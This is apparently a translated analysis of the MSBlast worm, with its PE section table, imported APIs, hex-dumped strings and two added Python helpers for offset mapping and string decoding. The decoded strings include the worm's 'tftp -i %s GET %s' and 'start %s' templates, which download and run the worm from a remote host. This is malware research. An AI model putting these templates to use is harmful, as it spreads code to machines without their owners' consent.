A few days ago I wrote an article about the msblast.exe worm outbreak, but it did not describe the virus in much detail. As a result, many readers thought the article was copy-and-paste work, which I admit made me uncomfortable. This article has two purposes: to make future virus analysis easier and to serve as my own notes on analysing this virus. Chinese security vendors have also not published a more specific analysis report, which is another reason for writing it. If you find anything wrong after reading it, please tell me. Thank you! Microsoft's security patch for this vulnerability can be downloaded from http://www.microsoft.com/technet/treeview?url=/technet/security/bulletin/MS03-026.asp
Unpacking the virus
On August 12, an emergency report came in from a company that was under attack by an unknown worm. After handling the incident, I retrieved the virus sample in the afternoon.
The retrieved sample, msblast.exe, is 6176 bytes. Viewing msblast.exe in Winhex shows that after unpacking the file grows to 11296 bytes.
Virus analysis
Open msblast.exe in W32Dasm to examine the PE file information; it is a great help for the analysis in the following sections.
**************************************** W32Dasm disassembly of msblast.exe ****************************************
Disassembly of File: msblast.exe
Code Offset = 00000400, Code Size = 00001458
Data Offset = 00001a00, Data Size = 0000088C
Number of Objects = 0004 (dec), Imagebase = 00400000h
Object01: .text  RVA: 00001000 Offset: 00000400 Size: 00001458 Flags: 60000020
Object02: .bss   RVA: 00003000 Offset: 00000000 Size: 00000000 Flags: C0000080
Object03: .data  RVA: 00004000 Offset: 00001a00 Size: 0000088C Flags: C0000040
Object04: .idata RVA: 00005000 Offset: 00002400 Size: 000006C0 Flags: C0000060
************************************************************************************************************
From the data above you can see how the virus is laid out in memory. The PE file has four sections: .text, .bss, .data and .idata. The entry point of the unpacked virus is 11CBh.
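To make the section table usable, here is an added Python example (mine, not from the article or from W32Dasm) that maps RVAs to file offsets and decodes the Flags values. It takes the four Object entries above as its input and assumes the stated entry point 11CBh is an RVA.

```python
# Added example: interpret the W32Dasm section table of the unpacked msblast.exe.
# Section values are copied from the W32Dasm output; 11CBh as an RVA is an assumption.

# IMAGE_SECTION_HEADER.Characteristics bits defined by the PE format
FLAG_BITS = {0x20: "CODE", 0x40: "INITIALIZED_DATA", 0x80: "UNINITIALIZED_DATA",
             0x20000000: "EXECUTE", 0x40000000: "READ", 0x80000000: "WRITE"}

# name: (RVA, raw file offset, raw size, characteristics) as listed by W32Dasm
SECTIONS = {
    ".text":  (0x1000, 0x0400, 0x1458, 0x60000020),
    ".bss":   (0x3000, 0x0000, 0x0000, 0xC0000080),
    ".data":  (0x4000, 0x1A00, 0x088C, 0xC0000040),
    ".idata": (0x5000, 0x2400, 0x06C0, 0xC0000060),
}

def describe_flags(flags):
    """Names of the characteristic bits set in a section's Flags value."""
    return {name for bit, name in FLAG_BITS.items() if flags & bit}

def section_for_rva(rva):
    """Section whose file-backed range contains rva, or None.
    .bss has raw size 0 (no bytes in the file), so it never matches."""
    for name, (va, _raw, size, _flags) in SECTIONS.items():
        if size and va <= rva < va + size:
            return name
    return None

def rva_to_offset(rva):
    """File offset holding the bytes for an RVA (the offset Winhex shows)."""
    name = section_for_rva(rva)
    if name is None:
        raise ValueError(f"RVA {rva:#x} is not backed by file data")
    va, raw, _size, _flags = SECTIONS[name]
    return raw + (rva - va)

def offset_to_rva(offset):
    """Inverse mapping: the RVA at which a Winhex file offset is loaded."""
    for va, raw, size, _flags in SECTIONS.values():
        if size and raw <= offset < raw + size:
            return va + (offset - raw)
    raise ValueError(f"offset {offset:#x} lies outside every section")

if __name__ == "__main__":
    ep = 0x11CB
    print(f"entry point RVA {ep:#x} -> file offset {rva_to_offset(ep):#x} in {section_for_rva(ep)}")
    for name, (_va, _raw, _size, flags) in SECTIONS.items():
        print(f"{name:7} {flags:08X} {sorted(describe_flags(flags))}")
    for off in (0x1A40, 0x21E0, 0x2200):   # string offsets the article reads in Winhex later
        print(f"file offset {off:#x} -> RVA {offset_to_rva(off):#x}")
```

Every string the Winhex part of the article finds in the 0x1a00..0x228c range therefore lives in .data, and the entry point falls in the only section marked EXECUTE.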
MSBlast.exe imports from five DLL modules and calls a total of 53 Win32 API functions. The five modules are KERNEL32.DLL, ADVAPI32.DLL, CRTDLL.DLL, WININET.DLL and WS2_32.DLL. The 53 functions are listed in the disassembly data below.
************************************************************************************************************
++ Imported Functions ++
Number of Imported Modules = 5 (decimal)
Import Module 001: KERNEL32.DLL
Import Module 002: ADVAPI32.DLL
Import Module 003: CRTDLL.DLL
Import Module 004: WININET.DLL
Import Module 005: WS2_32.DLL
++ Import Module Details ++
Import Module 001: KERNEL32.DLL
Addr: 000053e8 hint (0000) Name: ExitProcess
Addr: 000053f8 hint (0000) Name: ExitThread
Addr: 00005408 hint (0000) Name: GetCommandLineA
Addr: 0000541c hint (0000) Name: GetDateFormatA
Addr: 00005430 hint (0000) Name: GetLastError
Addr: 00005440 hint (0000) Name: GetModuleFileNameA
Addr: 00005458 hint (0000) Name: GetModuleHandleA
Addr: 0000546c hint (0000) Name: CloseHandle
Addr: 0000547c hint (0000) Name: GetTickCount
Addr: 0000548c hint (0000) Name: RtlUnwind
Addr: 00005498 hint (0000) Name: CreateMutexA
Addr: 000054a8 hint (0000) Name: Sleep
Addr: 000054b0 hint (0000) Name: TerminateThread
Addr: 000054c4 hint (0000) Name: CreateThread
Import Module 002: ADVAPI32.DLL
Addr: 000054d4 hint (0000) Name: RegCloseKey
Addr: 000054e4 hint (0000) Name: RegCreateKeyExA
Addr: 000054f8 hint (0000) Name: RegSetValueExA
Import Module 003: CRTDLL.DLL
Addr: 0000550c hint (0000) Name: __GetMainArgs
Addr: 0000551c hint (0000) Name: atoi
Addr: 00005524 hint (0000) Name: exit
Addr: 0000552c hint (0000) Name: fclose
Addr: 00005538 hint (0000) Name: fopen
Addr: 00005540 hint (0000) Name: fread
Addr: 00005548 hint (0000) Name: memcpy
Addr: 00005554 hint (0000) Name: memset
Addr: 00005560 hint (0000) Name: raise
Addr: 00005568 hint (0000) Name: rand
Addr: 00005570 hint (0000) Name: signal
Addr: 0000557c hint (0000) Name: sprintf
Addr: 00005588 hint (0000) Name: srand
Addr: 00005590 hint (0000) Name: strchr
Addr: 0000559c hint (0000) Name: strtok
Import Module 004: WININET.DLL
Addr: 000053cc hint (0000) Name: InternetGetConnectedState
Import Module 005: WS2_32.DLL
Addr: 000052c0 hint (0000) Name: htons
Addr: 000052c8 hint (0000) Name: ioctlsocket
Addr: 000052d8 hint (0000) Name: inet_addr
Addr: 000052e4 hint (0000) Name: inet_ntoa
Addr: 000052f0 hint (0000) Name: recvfrom
Addr: 000052fc hint (0000) Name: select
Addr: 00005308 hint (0000) Name: send
Addr: 00005310 hint (0000) Name: sendto
Addr: 0000531c hint (0000) Name: setsockopt
Addr: 0000532c hint (0000) Name: socket
Addr: 00005338 hint (0000) Name: gethostbyname
Addr: 00005348 hint (0000) Name: bind
Addr: 00005350 hint (0000) Name: gethostname
Addr: 00005360 hint (0000) Name: closesocket
Addr: 00005370 hint (0000) Name: WSAStartup
Addr: 00005380 hint (0000) Name: WSACleanup
Addr: 00005390 hint (0000) Name: connect
Addr: 0000539c hint (0000) Name: getpeername
Addr: 000053ac hint (0000) Name: getsockname
Addr: 000053bc hint (0000) Name: WSASocketA
++ Exported Functions ++
Number of Exported Functions = 0000 (decimal)
************************************************************************************************************
The import list above shows which Win32 APIs the virus calls. If you are not familiar with these functions, refer to MSDN for details; once you understand what each API does, every action of the virus follows from it.
The analysis so far was based on the disassembly; the following part uses Winhex to look at the virus in hexadecimal. Because variants of MSBlast.exe are not widespread, the hexadecimal findings below are largely consistent with the analyses published by the professional staff of other security vendors.
************************************************************************************************************
49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 20 59 4F 55 20 53 41 4E 21 21 00 62 69 6C 6C 79 20 67 61 74 65 73 20 77 68 79 20 64 6F 20 79 6F 75 20 6D 61 6B 65 20 74 68 69 73 20 70 6F 73 73 69 62 6C 65 20 3F 20 53 74 6F 70 20 6D 61 6B 69 6E 67 20 6D 6F 6E 65 79 20 61 6E 64 20 66 69 78 20 79 6F 75 72 20 73 6F 66 74 77 61 72 65 21 21 00
Viewing the file in Winhex, the bytes at offset 00001a40 are ASCII text; decoded, they are two NUL-terminated strings:
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
************************************************************************************************************
77 69 6E 64 6F 77 73 75 70 64 61 74 65 2E 63 6F 6D
The bytes at offset 000021e0 decode to the plaintext:
windowsupdate.com
************************************************************************************************************
73 74 61 72 74 20 25 73 0A 00 74 66 74 70 20 2D 69 20 25 73 20 47 45 54 20 25 73
The bytes at offset 00002200 decode to two strings, where %s is a placeholder that the virus fills in at run time:
start %s
tftp -i %s GET %s
************************************************************************************************************
77 69 6E 64 6F 77 73 20 61 75 74 6F 20 75 70 64 61 74 65 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E
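The manual Winhex step above can be automated. The following added Python example (mine, not the article's) decodes the byte dumps quoted above into their NUL-separated strings, keeps a trailing string even when the dump ends before its terminator, and marks the sprintf templates by counting their %-placeholders. The offset labels follow the article; "run key" is my own label for the last dump.

```python
# Added example: decode the Winhex byte dumps quoted in the article into strings.
import re
import string

# Byte dumps copied from the article; the dict keys are my labels.
DUMPS = {
    "0x1a40": ("49 20 6A 75 73 74 20 77 61 6E 74 20 74 6F 20 73 61 79 20 4C 4F 56 45 20 59 4F 55 "
               "20 53 41 4E 21 21 00 62 69 6C 6C 79 20 67 61 74 65 73 20 77 68 79 20 64 6F 20 79 6F "
               "75 20 6D 61 6B 65 20 74 68 69 73 20 70 6F 73 73 69 62 6C 65 20 3F 20 53 74 6F 70 20 "
               "6D 61 6B 69 6E 67 20 6D 6F 6E 65 79 20 61 6E 64 20 66 69 78 20 79 6F 75 72 20 73 6F "
               "66 74 77 61 72 65 21 21 00"),
    "0x21e0": "77 69 6E 64 6F 77 73 75 70 64 61 74 65 2E 63 6F 6D",
    "0x2200": "73 74 61 72 74 20 25 73 0A 00 74 66 74 70 20 2D 69 20 25 73 20 47 45 54 20 25 73",
    "run key": ("77 69 6E 64 6F 77 73 20 61 75 74 6F 20 75 70 64 61 74 65 00 53 4F 46 54 57 41 52 45 "
                "5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 5C 43 75 72 72 65 6E"),
}

PRINTABLE = set(string.printable) - {"\x0b", "\x0c"}

def parse_hex_dump(text):
    """Turn a Winhex-style 'XX XX XX' dump into bytes."""
    return bytes(int(tok, 16) for tok in text.split())

def extract_strings(data, min_len=4):
    """Split at NUL and keep printable runs of at least min_len characters.
    Returns (text, terminated) pairs; terminated is False for a final run that
    has no NUL, i.e. the dump may have been cut off before the string ended."""
    chunks = data.split(b"\x00")
    found = []
    for i, chunk in enumerate(chunks):
        s = chunk.decode("latin-1")
        if len(s) >= min_len and all(c in PRINTABLE for c in s):
            found.append((s, i < len(chunks) - 1))
    return found

def format_args(s):
    """Number of %-conversions a printf/sprintf template consumes (%% is a literal)."""
    return len(re.findall(r"%[a-zA-Z]", s.replace("%%", "")))

if __name__ == "__main__":
    for label, dump in DUMPS.items():
        for s, terminated in extract_strings(parse_hex_dump(dump)):
            tmpl = f" [sprintf template, {format_args(s)} arg(s)]" if format_args(s) else ""
            cut = "" if terminated else " (no NUL terminator: dump truncated)"
            print(f"{label}: {s!r}{tmpl}{cut}")
```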